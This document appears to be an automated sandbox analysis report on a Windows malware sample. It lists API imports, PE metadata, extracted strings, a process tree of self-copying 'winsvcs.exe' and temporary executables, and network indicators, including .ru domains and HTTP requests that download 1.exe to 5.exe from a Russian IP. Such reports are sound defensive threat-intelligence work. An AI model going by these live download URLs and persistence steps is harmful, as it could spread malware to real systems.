msvcrt.dll.isdigit
msvcrt.dll.memset
msvcrt.dll.memcpy
wininet.dll.InternetOpenUrlA
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
wininet.dll.InternetReadFile
wininet.dll.InternetOpenUrlW
wininet.dll.InternetOpenW
wininet.dll.InternetOpenA
urlmon.dll.URLDownloadToFileW
shlwapi.dll.PathFileExistsW
shlwapi.dll.PathFindFileNameA
kernel32.dll.GetModuleFileNameW
kernel32.dll.GetFileAttributesW
kernel32.dll.CopyFileW
kernel32.dll.CreateDirectoryW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.GetDriveTypeW
kernel32.dll.FindFirstFileW
kernel32.dll.FindClose
kernel32.dll.DeleteFileW
kernel32.dll.CloseHandle
kernel32.dll.WriteFile
kernel32.dll.GetTickCount
kernel32.dll.GlobalUnlock
kernel32.dll.ExitThread
kernel32.dll.Sleep
kernel32.dll.GlobalAlloc
kernel32.dll.GlobalLock
kernel32.dll.FindNextFileW
kernel32.dll.SetFileAttributesW
kernel32.dll.GetVolumeInformationW
kernel32.dll.CreateProcessW
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.CreateFileW
kernel32.dll.GetStartupInfoA
kernel32.dll.GetModuleHandleA
kernel32.dll.CreateThread
kernel32.dll.CreateMutexA
kernel32.dll.GetLastError
user32.dll.OpenClipboard
user32.dll.EmptyClipboard
user32.dll.GetClipboardData
user32.dll.CloseClipboard
user32.dll.SetClipboardData
advapi32.dll.RegQueryValueExW
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegCloseKey
advapi32.dll.RegSetValueExW
advapi32.dll.RegCreateKeyExA
shell32.dll.ShellExecuteW
ole32.dll.CoInitialize
ole32.dll.CoCreateInstance
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
ole32.dll.CoUninitialize
oleaut32.dll.#500
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
C:\Windows\495060393034060\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Users\user\AppData\Local\Temp\3180725230.exe
C:\Windows\806084767800850\winsvcs.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe
C:\Users\user\AppData\Local\Temp\1498839355.exe
596030303050
IESQMMUTEX_0_208
650870850508

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x0040612b
Reported Checksum 0x00030a82
Actual Checksum 0x00030a82
Minimum OS Version 5.1
Compile Time 2017-10-14 21:00:54
Import Hash c07e3df57b355727f548e05ac8faa5e9
Exported DLL Name \x8e\x01LookupPrivilegeNameA

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00013dae 0x00013e00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.56
.rdata 0x00015000 0x00004300 0x00004400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.28
.data 0x0001a000 0x0000bf68 0x00009600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.02
.rsrc 0x00026000 0x00001828 0x00001a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.93
.reloc 0x00028000 0x00001cac 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 4.69

Imports

Library KERNEL32.dll:
0x415028 TerminateThread
0x41502c TerminateProcess
0x415030 SetComputerNameExW
0x415034 GetLastError
0x415038 GetProcAddress
0x415040 SetCommMask
0x415048 VirtualProtect
0x415050 DuplicateHandle
0x415054 LoadLibraryW
0x415058 CloseHandle
0x415060 GetThreadTimes
0x415064 lstrcpyA
0x41506c CreateFileA
0x415070 GetLocaleInfoW
0x415074 LoadLibraryA
0x415078 GlobalAlloc
0x41507c GetProcessTimes
0x415080 EnumTimeFormatsA
0x415084 GetDriveTypeA
0x415088 EscapeCommFunction
0x41508c GetModuleHandleW
0x415090 GetCommProperties
0x415094 GetCurrentProcess
0x4150a0 ExitProcess
0x4150a4 FlushFileBuffers
0x4150a8 WriteConsoleW
0x4150ac GetConsoleOutputCP
0x4150b0 WriteConsoleA
0x4150bc Sleep
0x4150d0 HeapFree
0x4150dc IsDebuggerPresent
0x4150e0 GetCommandLineA
0x4150e4 GetStartupInfoA
0x4150e8 RtlUnwind
0x4150ec RaiseException
0x4150f0 LCMapStringA
0x4150f4 WideCharToMultiByte
0x4150f8 MultiByteToWideChar
0x4150fc LCMapStringW
0x415100 GetCPInfo
0x415104 HeapAlloc
0x415108 HeapCreate
0x41510c VirtualFree
0x415110 VirtualAlloc
0x415114 HeapReAlloc
0x415118 TlsGetValue
0x41511c TlsAlloc
0x415120 TlsSetValue
0x415124 TlsFree
0x415128 SetLastError
0x41512c GetCurrentThreadId
0x415130 ReadFile
0x415134 WriteFile
0x415138 GetConsoleCP
0x41513c GetConsoleMode
0x415140 GetStdHandle
0x415144 GetModuleFileNameA
0x415158 SetHandleCount
0x41515c GetFileType
0x415164 GetTickCount
0x415168 GetCurrentProcessId
0x415170 HeapSize
0x415174 GetACP
0x415178 GetOEMCP
0x41517c IsValidCodePage
0x415180 GetUserDefaultLCID
0x415184 GetLocaleInfoA
0x415188 EnumSystemLocalesA
0x41518c IsValidLocale
0x415190 GetStringTypeA
0x415194 GetStringTypeW
0x41519c SetFilePointer
0x4151a0 SetStdHandle
Library USER32.dll:
0x4151b0 GetScrollRange
0x4151b4 GetPropW
0x4151b8 PostMessageW
0x4151bc GetFocus
0x4151c0 SetScrollRange
Library GDI32.dll:
0x41501c EndPath
0x415020 FillPath
Library ADVAPI32.dll:
0x415004 GetUserNameA
Library MSIMG32.dll:
0x4151a8 TransparentBlt
Library WINHTTP.dll:
0x4151c8 WinHttpOpen
0x4151cc WinHttpCloseHandle

Exports

Ordinal Address Name
101678 0x6e8500de
101679 0x74a15064
101680 0x44870068
101681 0x2e723349
101682 0xac6c64
101683 0x659302af
101684 0x63a55374
101685 0x74a97275
101686 0x73a54479
101687 0x70a97263
101688 0x43b26f74
101689 0x72b46e6f
101690 0x406c6f
101691 0x6f8c018e
101692 0x70b56b6f
101693 0x76a97250
101694 0x67a56c69
101695 0x6da14e65
101696 0x404165
101697 0x65870141
101698 0x63a55374
101699 0x74a97275
101700 0x73a54479
101701 0x70a97263
101702 0x43b26f74
101703 0x72b46e6f
101704 0x406c6f
101705 0x6587015e
101706 0x65b35574
101707 0x6da14e72
101708 0x404165
101709 0x6e890178
101710 0x61a97469
101711 0x79936574
101712 0x6da57473
101713 0x74b56853
101714 0x6eb76f64
101715 0x1820057
101716 0x53b46547
101717 0x72b56365
101718 0x44b97469
101719 0x72a37365
101720 0x6fb47069
101721 0x63a14472
101722 0x4481006c
101723 0x49904156
101724 0x646e3233
101725 0x406c6c
101726 0x72940003
101727 0x70b36e61
101728 0x6ea57261
101729 0x74ac4274
101730 0x538d0000
101731 0x33874d49
101732 0x6ca42e32
101733 0x48006c
101734 0x48ae6957
101735 0x43b07474
101736 0x65b36f6c
101737 0x64ae6148
101738 0x40656c
101739 0x69970010
101740 0x74b4486e
101741 0x65b04f70
101742 0x4997006e
101743 0x5494484e
101744 0x6ca42e50
101745 0x300006c
101746 0x65b46e49
101747 0x63af6c72
101748 0x49a4656b
101749 0x65b2636e
101750 0x74ae656d
101751 0x2fc0000
101752 0x65b46e49
101753 0x63af6c72
101754 0x44a4656b
101755 0x65b26365
101756 0x74ae656d
101757 0x4610000
101758 0x65a56c53
101759 0x2f40070
101760 0x74a96e49
101761 0x69ac6169
101762 0x7283657a
101763 0x63a97469
101764 0x65936c61
101765 0x6fa97463
101766 0xfe006e
101767 0x65ac6544
101768 0x72836574
101769 0x63a97469
101770 0x65936c61
101771 0x6fa97463
101772 0x119006e
101773 0x65b46e45
101774 0x69b24372
101775 0x61a36974
101776 0x63a5536c
101777 0x6eaf6974
101778 0x32f0000
101779 0x76a1654c
101780 0x69b24365
101781 0x61a36974
101782 0x63a5536c
101783 0x6eaf6974
101784 0x2e10000
101785 0x70a16548
101786 0x65a57246
101787 0x47e0000
101788 0x61a86e55
101789 0x65ac646e
101790 0x63b84564
101791 0x69b47065
101792 0x69866e6f
101793 0x72a5746c
101794 0x4550000
101795 0x55b46553
101796 0x6ea1686e
101797 0x64a56c64
101798 0x65a37845
101799 0x6fa97470
101800 0x6ca9466e
101801 0xb26574
101802 0x738902d1
101803 0x75a26544
101804 0x72a56767
101805 0x73a57250
101806 0xb46e65
101807 0x6587016f
101808 0x6daf4374
101809 0x64ae616d
101810 0x65ae694c
101811 0x2790041
101812 0x53b46547
101813 0x74b26174
101814 0x6e897075
101815 0x816f66
101816 0x74920392
101817 0x77ae556c
101818 0xa46e69
101819 0x6192035a
101820 0x45a57369
101821 0x70a56378
101822 0x6eaf6974
101823 0x3210000
101824 0x618d434c
101825 0x72b45370
101826 0x41a76e69
101827 0x4ba0000
101828 0x65a46957
101829 0x72a16843
101830 0x758d6f54
101831 0x42a9746c
101832 0xa57479
101833 0x758d031a
101834 0x42a9746c
101835 0x54a57479
101836 0x64a9576f
101837 0x61a84365
101838 0x3230072
101839 0x618d434c
101840 0x72b45370
101841 0x57a76e69
101842 0x19b0000
101843 0x43b46547
101844 0x66ae4950
101845 0x2dd006f
101846 0x70a16548
101847 0x6fac6c41
101848 0x2df0063
101849 0x70a16548
101850 0x61a57243
101851 0x406574
101852 0x69960457
101853 0x61b57472
101854 0x65b2466c
101855 0x4940065
101856 0x74b26956
101857 0x41ac6175
101858 0x63af6c6c
101859 0x2e40000
101860 0x70a16548
101861 0x6c816552
101862 0xa36f6c
101863 0x6c940434
101864 0x74a54773
101865 0x75ac6156
101866 0x4720065
101867 0x41b36c54
101868 0x63af6c6c
101869 0x4750000
101870 0x53b36c54
101871 0x61967465
101872 0xa5756c
101873 0x6c940433
101874 0x65b24673
101875 0x42c0065
101876 0x4cb46553
101877 0x45b47361
101878 0x72af7272
101879 0x1ed0000
101880 0x43b46547
101881 0x65b27275
101882 0x6894746e
101883 0x64a16572
101884 0x406449
101885 0x65920368
101886 0x69866461
101887 0x40656c
101888 0x7297048d
101889 0x46a57469
101890 0xa56c69
101891 0x65870183
101892 0x6eaf4374
101893 0x65ac6f73
101894 0x405043
101895 0x65870195
101896 0x6eaf4374
101897 0x65ac6f73
101898 0x65a46f4d
101899 0x27b0000
101900 0x53b46547
101901 0x61886474
101902 0x65ac646e
101903 0x2340000
101904 0x4db46547
101905 0x6cb5646f
101906 0x6ca94665
101907 0x6da14e65
101908 0x404165
101909 0x7286014a
101910 0x6e856565
101911 0x6fb26976
101912 0x6ea56d6e
101913 0x72b45374
101914 0x73a76e69
101915 0x1ff0041
101916 0x45b46547
101917 0x72a9766e
101918 0x65ad6e6f
101919 0x7493746e
101920 0x67ae6972
101921 0x18b0073
101922 0x65a57246
101923 0x69b66e45
101924 0x6dae6f72
101925 0x53b46e65
101926 0x6ea97274
101927 0x977367
101928 0x658701c1
101929 0x76ae4574
101930 0x6eaf7269
101931 0x74ae656d
101932 0x69b27453
101933 0x57b3676e
101934 0x4280000
101935 0x48b46553
101936 0x6ca46e61
101937 0x75af4365
101938 0x40746e
101939 0x658701d7
101940 0x6ca94674
101941 0x70b95465
101942 0x3940065
101943 0x72a57551
101944 0x72a55079
101945 0x6db26f66
101946 0x65a36e61
101947 0x6eb56f43
101948 0xb26574
101949 0x65870266
101950 0x63a95474
101951 0x75af436b
101952 0x40746e
101953 0x658701aa
101954 0x72b54374
101955 0x74ae6572
101956 0x63af7250
101957 0x49b37365
101958 0x28f0064
101959 0x53b46547
101960 0x65b47379
101961 0x6da9546d
101962 0x46b34165
101963 0x54a56c69
101964 0xa56d69
101965 0x658802a6
101966 0x69937061
101967 0x40657a
101968 0x65870152
101969 0x50834174
101970 0x2530000
101971 0x4fb46547
101972 0x50834d45
101973 0x31b0000
101974 0x61967349
101975 0x43a4696c
101976 0x50a5646f
101977 0xa56761
101978 0x6587026d
101979 0x65b35574
101980 0x66a54472
101981 0x74ac7561
101982 0x4489434c
101983 0x2280000
101984 0x4cb46547
101985 0x6ca1636f
101986 0x66ae4965
101987 0x40416f
101988 0x6e8500f8
101989 0x79936d75
101990 0x6da57473
101991 0x61a36f4c
101992 0x41b3656c
101993 0x31d0000
101994 0x61967349
101995 0x4ca4696c
101996 0x6ca1636f
101997 0x27d0065
101998 0x53b46547
101999 0x6ea97274
102000 0x70b95467
102001 0x404165
102002 0x65870240
102003 0x72b45374
102004 0x54a76e69
102005 0x57a57079
102006 0x2f50000
102007 0x74a96e49
102008 0x69ac6169
102009 0x7283657a
102010 0x63a97469
102011 0x65936c61
102012 0x6fa97463
102013 0x64ae416e
102014 0x6ea97053
102015 0x6eb56f43
102016 0x41f0074
102017 0x46b46553
102018 0x50a56c69
102019 0x74ae696f
102020 0x407265
102021 0x659303fc
102022 0x64b45374
102023 0x64ae6148
102024 0x40656c
102025 0x72970482
102026 0x43a57469
102027 0x6fb36e6f
102028 0x81656c
102029 0x65870199
102030 0x6eaf4374
102031 0x65ac6f73
102032 0x70b4754f
102033 0x50837475
102034 0x4cc0000
102035 0x74a97257
102036 0x6eaf4365
102037 0x65ac6f73
102038 0x1810057
102039 0x73b56c46
102040 0x6ca94668
102041 0x66b54265
102042 0x73b26566
102043 0x3310000
102044 0x64a16f4c
102045 0x72a2694c
102046 0x41b97261
102047 0x22a0000
102048 0x4cb46547
102049 0x6ca1636f
102050 0x66ae4965
102051 0x40576f
102052 0x72830078
102053 0x65b46165
102054 0x65ac6946
102055 0x400041
.text
`.rdata
@.data
.rsrc
@.reloc
YQPVh
uQh\RA
GWh TA
QW@Ph
;5POB
t hxcA
t$h8\A
;5@OB
Yh$RA
9=,?B
FVh TA
;5POB
;=@OB
SVWUj
95d3B
95d3B
bad allocation
string too long
invalid string position
Unknown exception
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
(null)
`h````
CorExitProcess
runtime error
Microsoft Visual C++ Runtime Library
<program name unknown>
Program:
bad exception
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
bad allocation
VirtualAlloc
Module32FirstW
zedoxirivixavizozesafacanemafi
kernel
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
vector<T> too long
bad cast
ExitProcess
SetConsoleTextAttribute
GetCurrentProcess
GetCommProperties
GetModuleHandleW
EscapeCommFunction
EnumTimeFormatsA
GetDriveTypeA
GetProcessTimes
GlobalAlloc
LoadLibraryW
TerminateThread
TerminateProcess
SetComputerNameExW
GetLastError
GetProcAddress
SetProcessWorkingSetSize
SetCommMask
GetProcessAffinityMask
VirtualProtect
CreateToolhelp32Snapshot
DuplicateHandle
SetProcessShutdownParameters
CloseHandle
GetFileInformationByHandle
GetThreadTimes
lstrcpyA
LocalFileTimeToFileTime
KERNEL32.dll
GetPropW
GetScrollRange
SetScrollRange
GetFocus
PostMessageW
USER32.dll
FillPath
EndPath
GDI32.dll
SetSecurityDescriptorControl
LookupPrivilegeNameA
GetSecurityDescriptorControl
GetUserNameA
InitiateSystemShutdownW
GetSecurityDescriptorDacl
ADVAPI32.dll
TransparentBlt
MSIMG32.dll
WinHttpCloseHandle
WinHttpOpen
WINHTTP.dll
InterlockedIncrement
InterlockedDecrement
Sleep
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
HeapFree
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
GetCommandLineA
GetStartupInfoA
RtlUnwind
RaiseException
LCMapStringA
WideCharToMultiByte
MultiByteToWideChar
LCMapStringW
GetCPInfo
HeapAlloc
HeapCreate
VirtualFree
VirtualAlloc
HeapReAlloc
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
SetLastError
GetCurrentThreadId
ReadFile
WriteFile
GetConsoleCP
GetConsoleMode
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
SetHandleCount
GetFileType
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
HeapSize
GetACP
GetOEMCP
IsValidCodePage
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
GetStringTypeA
GetStringTypeW
InitializeCriticalSectionAndSpinCount
SetFilePointer
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
FlushFileBuffers
LoadLibraryA
GetLocaleInfoW
CreateFileA
.?AV_Locimp@locale@std@@
.?AVout_of_range@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV?$ctype@D@std@@
.?AUctype_base@std@@
.?AVfacet@locale@std@@
.?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$_Iosb@H@std@@
.?AVios_base@std@@
zacesilotamomoxi
detavu gosugugozebejegikivejoxegafu
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVfailure@ios_base@std@@
,/'5#
?1?#*$
59(,$/4"
*=" 1
--8'7
",35
);(%3
:(/='4!=%
. 63!
+($;!11'
.?AVlength_error@std@@
.?AVbad_cast@std@@
.?AVbad_alloc@std@@
>J?l?
>)?I?W?\?
30<4<
=,=L=
KERNEL32.DLL
(null)
mscoree.dll
kernel32.dll
hulonexesodamerureladu padocatuzumuruyajehu zikafupodecigosasetidiyojeyu xamilodedonekutiguyiloyojimi
VS_VERSION_INFO
StringFileInfo
457aa56b
InternalName
xesifun.exe
ProductVersion
5.8.1.75
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


BdTTBslVE5X4r.exe, PID: 2952, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
Command Line: "C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe"
winsvcs.exe, PID: 2908, Parent PID: 2952
Full Path: C:\Windows\495060393034060\winsvcs.exe
Command Line: C:\Windows\495060393034060\winsvcs.exe
3895820593.exe, PID: 2776, Parent PID: 2908
Full Path: C:\Users\user\AppData\Local\Temp\3895820593.exe
Command Line: C:\Users\user\AppData\Local\Temp\3895820593.exe
winsvcs.exe, PID: 3068, Parent PID: 2776
Full Path: C:\Windows\806084767800850\winsvcs.exe
Command Line: C:\Windows\806084767800850\winsvcs.exe
3971618177.exe, PID: 2936, Parent PID: 3068
Full Path: C:\Users\user\AppData\Local\Temp\3971618177.exe
Command Line: C:\Users\user\AppData\Local\Temp\3971618177.exe
winsvcs.exe, PID: 2744, Parent PID: 2936
Full Path: C:\Windows\806084767800850\winsvcs.exe
Command Line: C:\Windows\806084767800850\winsvcs.exe
1015321578.exe, PID: 2612, Parent PID: 2744
Full Path: C:\Users\user\AppData\Local\Temp\1015321578.exe
Command Line: C:\Users\user\AppData\Local\Temp\1015321578.exe

Hosts

Direct IP Country Name
N 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49170 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49171 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49172 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49173 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49179 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49180 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49186 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49188 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49199 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49205 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49206 92.63.197.48 slpsrgpsrhojifdij.ru 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 49407 8.8.8.8 53
192.168.35.21 49507 8.8.8.8 53
192.168.35.21 49793 8.8.8.8 53
192.168.35.21 50026 8.8.8.8 53
192.168.35.21 50105 8.8.8.8 53
192.168.35.21 50506 8.8.8.8 53
192.168.35.21 50603 8.8.8.8 53
192.168.35.21 51201 8.8.8.8 53
192.168.35.21 51369 8.8.8.8 53
192.168.35.21 51900 8.8.8.8 53
192.168.35.21 51910 8.8.8.8 53
192.168.35.21 51968 8.8.8.8 53
192.168.35.21 52399 8.8.8.8 53
192.168.35.21 52471 8.8.8.8 53
192.168.35.21 52956 8.8.8.8 53
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 53719 8.8.8.8 53
192.168.35.21 54169 8.8.8.8 53
192.168.35.21 54941 8.8.8.8 53
192.168.35.21 55165 8.8.8.8 53
192.168.35.21 55192 8.8.8.8 53
192.168.35.21 56004 8.8.8.8 53
192.168.35.21 56514 8.8.8.8 53
192.168.35.21 56531 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 57334 8.8.8.8 53
192.168.35.21 57702 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53
192.168.35.21 58453 8.8.8.8 53
192.168.35.21 59473 8.8.8.8 53
192.168.35.21 59742 8.8.8.8 53
192.168.35.21 61029 8.8.8.8 53
192.168.35.21 61115 8.8.8.8 53
192.168.35.21 63030 8.8.8.8 53
192.168.35.21 63148 8.8.8.8 53
192.168.35.21 63336 8.8.8.8 53
192.168.35.21 63526 8.8.8.8 53
192.168.35.21 63549 8.8.8.8 53
192.168.35.21 64235 8.8.8.8 53
192.168.35.21 64292 8.8.8.8 53
192.168.35.21 64523 8.8.8.8 53
192.168.35.21 64801 8.8.8.8 53
192.168.35.21 64869 8.8.8.8 53
192.168.35.21 64891 8.8.8.8 53
192.168.35.21 64992 8.8.8.8 53
192.168.35.21 65365 8.8.8.8 53
192.168.35.21 65426 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru [VT] A 92.63.197.48 [VT]
osheoufhusheoghuesd.ru [VT] NXDOMAIN [VT]
ofheofosugusghuhush.ru [VT]
suieiusiueiuiuushgf.ru [VT]
fuiueufiiehfueghuhf.ru [VT]
sisoefjsuhuhaudhhed.ru [VT]
opllforgirsoofuhohu.ru [VT]
eooeoeooejesfiehfii.ru [VT]
oefosfishiudhiusegf.ru [VT]
aaeiauebfaneifuaeif.ru [VT]
naibfiahdiauehihhre.ru [VT]
auaeuiihaehifhahaud.ru [VT]
oieoaidhhaidhiehheg.ru [VT]
fisiuuiedesubdibesd.ru [VT]
efiiuehdiahiuediaug.ru [VT]
sfiushidhseiugiuseh.ru [VT]
oeiieieisijdingisgf.ru [VT]
aiisiaueuefiuhiehgu.ru [VT]
sfsiuhieghaughaoeho.ru [VT]
hpptlhptdkoodsokdke.ru [VT]
eneebgieeiieieiddrt.ru [VT]
eniaebivaiebifaibef.ru [VT]
mmginsiridnsinnsgir.ru [VT]
gmndaudnahgahghaohh.ru [VT]
aefaidihabevbabifba.ru [VT]
rgijirshisjriijdijh.ru [VT]
aiehazegfageigfzgei.ru [VT]
foaeodheuabguaegubr.ru [VT]
guhaohadueoanavbvbf.ru [VT]
orsodaououaebufbeob.ru [VT]
eaiiakeiohoueghoaur.ru [VT]
naiebiaifzgfaezgdzr.ru [VT]
gaeuhdobaoebuagoaoe.ru [VT]
giuahfoaoeubfouaena.ru [VT]
rgsouhdoauenodaeufb.ru [VT]
eoguaonedonaodabobg.ru [VT]
gouaondoaudbaebobgu.ru [VT]
giohuoaehdoueofbaur.ru [VT]
gnaoedoaoounauubueu.ru [VT]
gbobaebaodebuoueofu.ru [VT]
srgouosehohedohaeoh.ru [VT]
goauhoednoaueouabbe.ru [VT]
gnaednouebaoubefoub.ru [VT]
plpaedjaofheagoahdg.ru [VT]
guaeudueaennnaenuen.ru [VT]
rgoonedoauneuoebuae.ru [VT]

HTTP Requests

URI Data
http://slpsrgpsrhojifdij.ru/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/5.exe
GET /5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://92.63.197.48/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/5.exe
GET /5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

